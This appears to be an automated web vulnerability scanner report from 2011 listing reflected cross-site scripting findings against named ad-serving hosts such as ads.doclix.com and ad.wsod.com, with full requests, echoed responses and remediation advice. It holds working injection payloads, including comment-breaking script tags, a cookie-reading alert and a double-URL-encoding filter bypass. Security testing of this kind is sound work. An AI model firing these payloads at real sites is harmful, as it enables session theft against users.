GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:58 GMT; path=/
Set-Cookie: i_1=19:1537:706:23:0:38885:1297024558:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 929
function wsod_image() { document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn ...[SNIP]... g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.706.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" t ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29654%2522%253balert%25281%2529%252f%252fbaf59fc0de was submitted in the REST URL parameter 2. This input was echoed as 29654";alert(1)//baf59fc0de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135729654%2522%253balert%25281%2529%252f%252fbaf59fc0de/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1917
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db4%2522%253balert%25281%2529%252f%252f81b157f6309 was submitted in the REST URL parameter 3. This input was echoed as d1db4";alert(1)//81b157f6309 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4%2522%253balert%25281%2529%252f%252f81b157f6309/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:36:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcde6"-alert(1)-"469bc60813b was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918
1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ece2"-alert(1)-"d2c7ce0c658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1921
The value of the cnt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb3a3%3balert(1)//c4478348b8 was submitted in the cnt parameter. This input was echoed as eb3a3;alert(1)//c4478348b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1eb3a3%3balert(1)//c4478348b8&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4045
var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
var doclix_ifrm_url_1eb3a3;alert(1)//c4478348b8 = document.location.protocol+'//'+doclix_ads_domain+'/adserver/serve/js/doclix_ad_ifrm.jsp?';
var ad_setup_str = 'save_ad_code=Save|delete_ad_code=|ad_unit_type_lu=true|unit_standard_size=574 ...[SNIP]...
The value of the cnt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1a1'%3balert(1)//64b668db5b7 was submitted in the cnt parameter. This input was echoed as ec1a1';alert(1)//64b668db5b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1ec1a1'%3balert(1)//64b668db5b7&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:07 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4077
1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.doclix.com
Path: /adserver/serve/js/fixed_size_unit.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9a09'-alert(1)-'64baa0df0a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3658
The value of the pageId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39457'-alert(1)-'cf387d9fc83 was submitted in the pageId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3655
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 223f2<script>alert(1)</script>718630f8bab was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767223f2<script>alert(1)</script>718630f8bab&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:06 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
<html>
<head>
<title>Ads by Quigo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
java.lang.NumberFormatException: For input string: "1990767223f2<script>alert(1)</script>718630f8bab"
The value of the placementId request parameter is copied into an HTML comment. The payload 6a27b--><script>alert(1)</script>4b7d7d76112 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056916a27b--><script>alert(1)</script>4b7d7d76112&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:57 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3331
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "15056916a27b--><script>alert(1)</script>4b7d7d76112" -->
...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 25700--><script>alert(1)</script>46ca0f2bc33 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-125700--><script>alert(1)</script>46ca0f2bc33&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body>
<!-- java.lang.NumberFormatException: For input string: "-125700--><script>alert(1)</script>46ca0f2bc33" -->
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload d3fe7<script>alert(1)</script>a3a3fcc09ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff&source=js&ord=24803036 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; FSddf63%3Cscript%3Ealert%28document=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4046&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSQTS038=pctl=287337&pctm=1&fpt=0%2C287337%2C&pct%5Fdate=4053&FL287337=1&FM31975=1&pctc=31975&FQ=1
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:38:49 GMT
Server: Microsoft-IIS/7.0
